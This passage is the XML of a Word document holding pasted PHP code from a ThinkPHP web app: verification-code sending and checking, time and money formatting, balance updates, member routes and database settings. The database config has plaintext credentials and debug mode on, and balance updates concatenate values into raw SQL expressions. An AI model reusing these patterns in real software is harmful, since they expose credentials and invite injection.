          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B30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$Send-&gt;email(['email'=&gt;$username,'content'=&gt;$temp]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67AB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if($result !== true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332B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邮箱发送失败，请检查后台邮箱配置是否正确，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87C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11F33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$data=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05184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8BA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if($name=='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587FB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if(!$sdkMobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A1F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'sdkMobile</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比较值不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4F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F7A9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$sdkMobile=Db::name('member_config')-&gt;where('name',$sdkMobile)-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25BD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$Send-&gt;sms([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E272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'param'  =&gt; ["code"=&gt;"$code"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258CE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=&gt; $username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA3E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'template'  =&gt; $sdkMobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C624B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05C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if($result !== true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E60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短信发送失败：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F32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B47F3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$data=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E6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$data=Db::name('code')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBB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E6F1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1D9DB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$data='$name</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比较错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCFD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BCDC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D67F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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模板通知内容获取错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C94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4C3D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6CDB0B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A46A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_codechecking($code='',$username=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742E6E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if(!$code) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E4A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if(!$username) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C46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$mobile=$email=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7D9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if(_isMobile($username)){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9903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$mobile=$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723199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}elseif(_isEmail($username)){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D583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$email=$username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110F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247D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号码未知或格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4EA1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8486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if(!$mobile &amp;&amp; !$email) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>号码未知或格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38323B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$db=Db::name('code')-&gt;where(['code'=&gt;$code,'username'=&gt;$username])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A0B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4280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if($mobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F46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手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B301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if($email){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555952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邮箱验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF76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23229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验证码错误，请重新输入</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097F34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12BB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B24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67D533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$jdate=$db['time']+$db['maturity'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D94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if($time&gt;$jdate) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码过期，请重发验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B615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if(md5($db['code'])==md5($code) &amp;&amp; md5($db['username'])==md5($username)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870D4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Db::name('code')-&gt;where('id',$db['id'])-&gt;setField('type',1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B4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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC1D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DC8C5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if($mobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5058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手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375EB2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if($email){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9BB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邮箱验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E2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8971E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验证码错误，请重新输入</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08755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D73B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00B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B0C73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_mobile($mobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB00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if(!$mobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649A9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32EA6B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1F41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$data=substr($mobile,0,3).'****'.substr($mobile,7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5831A0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2D9D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B1AD4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_imgUrl(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C7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42A6DC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$db['3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D46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35A9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_inArray($b,$a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED7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if(!$b || !$a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CA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E29CC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9419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($a as $value){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5098F0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(strtolower($value) == strtolower($b)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F34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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DEB6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8189C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329C7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E0C1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701B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videoDate($date){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D2F6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$date=intval($date);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D69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if(!$date){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A6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24FD1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810C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if($date&lt;59){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C987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$data='00:'.$date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DB1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151A0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$hour = floor($date/3600);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381A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$minute = floor(($date-3600*$hour)/60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CFF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if($minute&lt;10){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F79F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$minute="0".$minute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA34D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F26F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$second = floor((($date-3600*$hour)-60*$minute)%60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209CC3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if($second&lt;10){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390354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$second="0".$second;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC3A8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1909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$data=$minute.':'.$second;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B969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968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CAC7F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9259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_typeTid($tid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E5C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$data[]=(int)$tid;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAF6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$typetid=Db::name('typeid')-&gt;where('tid',$tid)-&gt;field('id')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56030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if($typetid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72AE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($typetid as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AE6E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC97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_typeTid($v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E739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9D8E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632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DD7BF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8DCBC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_userGuanzhuList($uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2742B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$data=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$uid])-&gt;field('gz_uid')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9ED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3A39FC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D893C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$v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DDF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$user[]=$v['gz_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F03D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8563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$user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79537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6D2B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013D6C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C722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function _time($time){       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163C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p>
    <w:p w14:paraId="5BEE4E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 === NULL || $time &gt; time() ? time() : intval($time);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60521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 = time() - $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F53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 = date('Y', $time)-date('Y', time());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7147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switch($t){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD5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$t == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F220B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刚刚</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08216C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552DD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$t &lt; 60:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57092B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$t . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E06F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E1A64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$t &lt; 60 * 60:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D09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floor($t / 60) . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD1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058FE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$t &lt; 60 * 60 * 24:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0134A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floor($t / (60 * 60)) . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB999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73962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$t &lt; 60 * 60 * 24 * 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C5D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floor($time/(60*60*24)) ==1 ?'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昨天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' . date('H:i', $time) : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' . date('H:i', $time) ; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F15D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489D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$t &lt; 60 * 60 * 24 * 30:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E14B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date('m-d H:i', $time); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D3C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8980C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$t &lt; 60 * 60 * 24 * 365&amp;&amp;$y==0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1483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date('m-d', $time); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F397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11A5C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B563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date('Y-m-d', $time); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C76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5DAC1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445C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$text; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A5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5780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_moneyDb($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBF9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if(empty($data['uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F74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2DEA2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889C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$uid=$data['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DB16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79E7E0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4FA355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48148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if(!empty($data['money'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B66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$name=$data['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF64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if(empty($name['type'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C582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p>
    <w:p w14:paraId="25195E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949E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p>
    <w:p w14:paraId="0487D6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47A0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$money=$name['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EEED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 = ['exp','money'.$type.$money];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61238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2AD34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$where['money_num'] = ['exp','money_num+'.$money];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059AE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BAB5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$content=$name['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC93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if(!empty($content)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2FCD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$datas=$type=='+' ? '0' : '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD96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Db::name('yaoqing_records')-&gt;insert(['uid'=&gt;$uid,'content'=&gt;$content ,'money'=&gt;$money,'data'=&gt;$datas,'time'=&gt;$time,'ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E09D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148E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A54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if(!empty($data['jinbi']['money'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA55E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$name=$data['jinbi'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65274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if(empty($name['type'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6820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p>
    <w:p w14:paraId="48AF8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08887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p>
    <w:p w14:paraId="60D426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CA8A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$money=$name['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623F9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$where['jinbi'] = ['exp','jinbi'.$type.$money];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D192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3932A0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$where['jinbi_num'] = ['exp','jinbi_num+'.$money];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C8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2B4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$content=$name['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15561C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if(!empty($content)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DB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$datas=$type=='+' ? '0' : '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2AA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Db::name('yaoqing_records')-&gt;insert(['uid'=&gt;$uid,'content'=&gt;$content ,'money'=&gt;$money,'data'=&gt;$datas,'type'=&gt;1,'time'=&gt;$time,'ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D62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63A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0525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if(empty($where)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08816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794EB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2D8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$db=DB::name('yaoqing')-&gt;where('uid',$uid)-&gt;update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C25C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236C99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84E56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_money($money){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EFD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if(empty($money)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4168E9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'0.00';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4E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E10F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number_format($money/100,2,'.',''); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D2F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AD63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_num($a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A8D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 &gt; 10000){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E16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round($a / 10000,2).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>万</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57954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9E8E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CFC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BA52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8E72C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67951D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                       =&gt;                  'user/reg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FCE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'pwd/'                       =&gt;                  'user/password',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE881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'member/moneypay'                     =&gt;                  'member/moneypay',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC3E9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'member/article'                     =&gt;                  'member/article',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0CF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'member/articleadd'                     =&gt;                  'member/articleadd',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125295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'member/favoritelist'                     =&gt;                  'member/favoritelist',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05455B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'member/modify'                     =&gt;                  'member/modify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E374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'member/nickname'                     =&gt;                  'member/nickname',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6F2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'member/mobile'                     =&gt;                  'member/mobile',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F12C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'member/email'                     =&gt;                  'member/email',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D461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'member/password'                     =&gt;                  'member/password',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B0E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'member/records'                     =&gt;                  'member/records',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA97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'member/out'                     =&gt;                  'member/out',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BFE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F79D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60D459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4D7D9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'mysql',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65609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'hostname'       =&gt; 'db',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635D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'database'       =&gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2A73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=&gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9A2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=&gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9A5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'hostport'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF71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'dsn'            =&gt; 'mysql:host=db;dbname=suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75244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'params'         =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD61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'charset'        =&gt; 'utf8',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42C2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'prefix'         =&gt; 'fx_',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022FF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'debug'          =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B07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'deploy'         =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3336F4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'rw_separate'    =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DF2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'master_num'     =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FFE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'slave_no'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47848F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'fields_strict'  =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438549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'resultset_type' =&gt; 'array',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5356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'auto_timestamp' =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77283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'sql_explain'    =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB88D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C0DCE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8C6FA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[];&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479CD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FC7A0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Created by PhpStorm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855F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User: WANG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609C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Date: 2016-08-11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217000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Time: 9:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E053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0243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app\common\taglib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D37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think\template\TagLib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CE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1BCAB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Tag extends TagLib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E69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9FD1F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BCEF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定义标签列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41335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5FFA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$tags = [</w:t>
      </w:r>
    </w:p>
